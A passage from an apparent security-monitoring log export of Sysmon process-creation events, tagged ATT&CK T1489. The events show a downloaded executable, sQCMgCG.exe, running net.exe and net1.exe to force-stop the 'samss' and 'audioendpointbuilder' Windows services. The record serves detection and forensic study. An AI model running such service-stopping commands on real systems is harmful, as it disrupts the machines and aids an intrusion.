Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1b58-5ec9-0000-00107b162f00}"",""parentProcessId"":""344360"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:47:22.481",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: 
+UtcTime: 2020-05-23 12:47:20.879 +ProcessGuid: {df9fc3d3-1b58-5ec9-0000-00107b162f00} +ProcessId: 344360 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:47:20.907046800Z"",""eventRecordID"":""1736"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:47:20.879\r\nProcessGuid: {df9fc3d3-1b58-5ec9-0000-00107b162f00}\r\nProcessId: 344360\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: 
C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:47:20.879"",""processGuid"":""{df9fc3d3-1b58-5ec9-0000-00107b162f00}"",""processId"":""344360"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:47:22.424",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:47:20.797 +ProcessGuid: {df9fc3d3-1b58-5ec9-0000-0010ba132f00} +ProcessId: 344168 +Image: C:\Windows\System32\net1.exe 
+FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1b58-5ec9-0000-0010f00e2f00} +ParentProcessId: 343416 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:47:20.831170300Z"",""eventRecordID"":""1735"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:47:20.797\r\nProcessGuid: {df9fc3d3-1b58-5ec9-0000-0010ba132f00}\r\nProcessId: 344168\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 
0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1b58-5ec9-0000-0010f00e2f00}\r\nParentProcessId: 343416\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:47:20.797"",""processGuid"":""{df9fc3d3-1b58-5ec9-0000-0010ba132f00}"",""processId"":""344168"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1b58-5ec9-0000-0010f00e2f00}"",""parentProcessId"":""343416"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:47:22.395",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:47:20.665 +ProcessGuid: {df9fc3d3-1b58-5ec9-0000-0010f00e2f00} +ProcessId: 343416 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: 
Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:47:20.671355100Z"",""eventRecordID"":""1734"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:47:20.665\r\nProcessGuid: {df9fc3d3-1b58-5ec9-0000-0010f00e2f00}\r\nProcessId: 343416\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:47:20.665"",""processGuid"":""{df9fc3d3-1b58-5ec9-0000-0010f00e2f00}"",""processId"":""343416"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:46:54.309",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:52.960 +ProcessGuid: {df9fc3d3-1b3c-5ec9-0000-0010506e2a00} +ProcessId: 291948 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe 
+CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1b3c-5ec9-0000-001073602a00} +ParentProcessId: 291108 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:52.963141200Z"",""eventRecordID"":""1730"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:52.960\r\nProcessGuid: {df9fc3d3-1b3c-5ec9-0000-0010506e2a00}\r\nProcessId: 291948\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: 
{df9fc3d3-1b3c-5ec9-0000-001073602a00}\r\nParentProcessId: 291108\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:46:52.960"",""processGuid"":""{df9fc3d3-1b3c-5ec9-0000-0010506e2a00}"",""processId"":""291948"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1b3c-5ec9-0000-001073602a00}"",""parentProcessId"":""291108"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:46:54.294",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:52.911 +ProcessGuid: {df9fc3d3-1b3c-5ec9-0000-0010596a2a00} +ProcessId: 291752 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 
+TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1b3c-5ec9-0000-00102c552a00} +ParentProcessId: 290920 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:52.926647800Z"",""eventRecordID"":""1729"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:52.911\r\nProcessGuid: {df9fc3d3-1b3c-5ec9-0000-0010596a2a00}\r\nProcessId: 291752\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1b3c-5ec9-0000-00102c552a00}\r\nParentProcessId: 290920\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: 
\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:46:52.911"",""processGuid"":""{df9fc3d3-1b3c-5ec9-0000-0010596a2a00}"",""processId"":""291752"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1b3c-5ec9-0000-00102c552a00}"",""parentProcessId"":""290920"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:46:54.278",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:52.756 +ProcessGuid: {df9fc3d3-1b3c-5ec9-0000-001073602a00} +ProcessId: 291108 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:52.761412100Z"",""eventRecordID"":""1728"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:52.756\r\nProcessGuid: {df9fc3d3-1b3c-5ec9-0000-001073602a00}\r\nProcessId: 291108\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 
\""""},""eventdata"":{""utcTime"":""2020-05-23 12:46:52.756"",""processGuid"":""{df9fc3d3-1b3c-5ec9-0000-001073602a00}"",""processId"":""291108"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:46:54.263",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:52.529 +ProcessGuid: {df9fc3d3-1b3c-5ec9-0000-00102c552a00} +ProcessId: 290920 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:52.565290200Z"",""eventRecordID"":""1727"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:52.529\r\nProcessGuid: {df9fc3d3-1b3c-5ec9-0000-00102c552a00}\r\nProcessId: 290920\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft 